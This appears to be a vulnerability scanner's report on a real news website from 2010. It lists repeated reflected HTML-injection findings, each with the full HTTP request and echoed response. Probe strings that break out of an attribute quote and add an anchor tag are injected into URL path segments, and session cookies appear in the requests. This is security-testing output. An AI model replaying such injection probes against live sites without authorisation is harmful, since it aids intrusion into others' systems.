The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94e90"><a>6d2dca21409 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser94e90"><a>6d2dca21409/2001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Mon, 22 Nov 2010 01:11:11 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser94e90"><a>6d2dca21409 c_2001"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea8f1"><a>e333a4050b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2001ea8f1"><a>e333a4050b9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2001ea8f1"><a>e333a4050b9"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9ec"><a>4c7ba26d603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser8b9ec"><a>4c7ba26d603/2002 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:26 GMT Date: Mon, 22 Nov 2010 01:07:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser8b9ec"><a>4c7ba26d603 c_2002"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81f35"><a>ab191808721 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200281f35"><a>ab191808721 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:05 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200281f35"><a>ab191808721"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e568a"><a>3927a2b838d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowsere568a"><a>3927a2b838d/2003 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=238 Expires: Mon, 22 Nov 2010 01:11:23 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowsere568a"><a>3927a2b838d c_2003"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad8e"><a>70680a83295 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/20037ad8e"><a>70680a83295 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:05 GMT Date: Mon, 22 Nov 2010 01:08:05 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_20037ad8e"><a>70680a83295"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d956"><a>451286b1b41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser3d956"><a>451286b1b41/2004 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:11:18 GMT Date: Mon, 22 Nov 2010 01:07:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser3d956"><a>451286b1b41 c_2004"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4001"><a>2a88692267f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2004c4001"><a>2a88692267f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=220 Expires: Mon, 22 Nov 2010 01:11:43 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2004c4001"><a>2a88692267f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b232f"><a>d682f6a1f4b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserb232f"><a>d682f6a1f4b/2005 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=227 Expires: Mon, 22 Nov 2010 01:11:13 GMT Date: Mon, 22 Nov 2010 01:07:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserb232f"><a>d682f6a1f4b c_2005"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb267"><a>d1977a34166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2005eb267"><a>d1977a34166 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:02 GMT Date: Mon, 22 Nov 2010 01:08:02 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2005eb267"><a>d1977a34166"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bcac"><a>862b8130889 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser8bcac"><a>862b8130889/2006 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=229 Expires: Mon, 22 Nov 2010 01:11:12 GMT Date: Mon, 22 Nov 2010 01:07:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser8bcac"><a>862b8130889 c_2006"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6534"><a>0bc59f3675f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2006d6534"><a>0bc59f3675f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=221 Expires: Mon, 22 Nov 2010 01:11:44 GMT Date: Mon, 22 Nov 2010 01:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2006d6534"><a>0bc59f3675f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6336"><a>1e75e0fc687 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserf6336"><a>1e75e0fc687/2007 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=218 Expires: Mon, 22 Nov 2010 01:11:02 GMT Date: Mon, 22 Nov 2010 01:07:24 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserf6336"><a>1e75e0fc687 c_2007"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80e5b"><a>ed4954956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/200780e5b"><a>ed4954956 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29360 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:01 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_200780e5b"><a>ed4954956"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72ece"><a>46b8f298938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser72ece"><a>46b8f298938/2008 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=223 Expires: Mon, 22 Nov 2010 01:11:03 GMT Date: Mon, 22 Nov 2010 01:07:20 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser72ece"><a>46b8f298938 c_2008"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8cfb"><a>82e0732bfb6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/2008b8cfb"><a>82e0732bfb6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=219 Expires: Mon, 22 Nov 2010 01:12:01 GMT Date: Mon, 22 Nov 2010 01:08:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowser c_2008b8cfb"><a>82e0732bfb6"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f096d"><a>05f757fa8c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowserf096d"><a>05f757fa8c9/2009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=233 Expires: Mon, 22 Nov 2010 01:11:07 GMT Date: Mon, 22 Nov 2010 01:07:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_wired ss_coverbrowserf096d"><a>05f757fa8c9 c_2009"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f59a"><a>29622920453 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /wired/coverbrowser/20095f59a"><a>29622920453 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29364 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:11:58 GMT Date: Mon, 22 Nov 2010 01:07:58 GMT Connection: close
